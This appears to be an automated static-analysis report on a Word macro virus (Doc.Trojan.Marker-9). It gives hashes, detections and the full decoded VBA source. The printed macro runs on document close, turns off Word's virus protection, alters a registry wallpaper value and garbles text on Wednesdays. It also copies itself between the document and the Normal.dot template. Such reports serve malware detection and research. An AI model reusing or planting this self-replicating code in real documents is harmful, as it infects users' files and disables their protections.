Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2537488faa8c3d7f…

MALICIOUS

Office (OLE)

35.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 17fafafedf5bad755fddadfa11055d89 SHA-1: d8cccb0de35e60936c1bfbf56c182d1251fa32ac SHA-256: 2537488faa8c3d7f94012a64409c2a364e95728eb3a64fcf3caa231b0c0edea3
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV and contains VBA macros. The macro code attempts to infect the Normal.dot template by copying its own code into it, and also sets a registry value for 'WallPaper' to 'c:\NetSetup.log'. This suggests a macro-based malware that aims to persist and spread.

Heuristics 2

  • ClamAV: Doc.Trojan.Marker-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-9
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2186 bytes
SHA-256: 85894b3fcc57d426c01d511b8a945d63047810c0a4195fd18f575e200131fba7
Detection
ClamAV: Doc.Trojan.Marker-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next

If (WeekDay(Now()) = vbWednesday) Then
    Application.ScreenUpdating = False
    ActiveWindow.WindowState = wdWindowStateMinimize
End If

Const Kuku = "Black Wednesday!"

'Declare Variables
Dim SaveDoc, SaveNormalTempl, DocInfected, NormalTemplInfected As Boolean
Dim ActDoc, NormTempl As Object
Dim MyCod, UserAddress, LogData, LogFile As String
Dim a1, FileLocal, FileServer As Integer

'Initialize Variables
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormTempl = NormalTemplate.VBProject.VBComponents.Item(1)

DocInfected = ActDoc.CodeModule.Find(Kuku, 1, 1, 10000, 10000)
NormalTemplInfected = NormTempl.CodeModule.Find(Kuku, 1, 1, 10000, 10000)

'Switch the VirusProtection OFF
Options.VirusProtection = False

System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", _
"WallPaper") = "c:\NetSetup.log"

If (WeekDay(Now()) = vbWednesday) Then
    Selection.MoveDown Unit:=wdLine, Count:=20, Extend:=wdExtend
    Selection.Range.Case = wdNextCase
    ActiveDocument.Save
End If
'Make sure that some conditions are true before we continue infecting anything
If (DocInfected = True Xor NormalTemplInfected = True) Then
  'Infect the NormalTemplate
  If DocInfected = True Then
 
    MyCod = ActDoc.CodeModule.Lines(1, ActDoc.CodeModule.CountOfLines)

    a1 = NormTempl.CodeModule.CountOfLines
    NormTempl.CodeModule.DeleteLines 1, a1
    NormTempl.CodeModule.AddFromString MyCod
    
    NormalTemplate.Save
  End If
              
  'Infect the ActiveDocument
  If NormalTemplInfected = True Then

    OurCode = NormTempl.CodeModule.Lines(1, NormTempl.CodeModule.CountOfLines)

    a1 = ActDoc.CodeModule.CountOfLines
    ActDoc.CodeModule.DeleteLines 1, a1
    ActDoc.CodeModule.AddFromString OurCode
    
    ActiveDocument.Save
  End If
End If
End Sub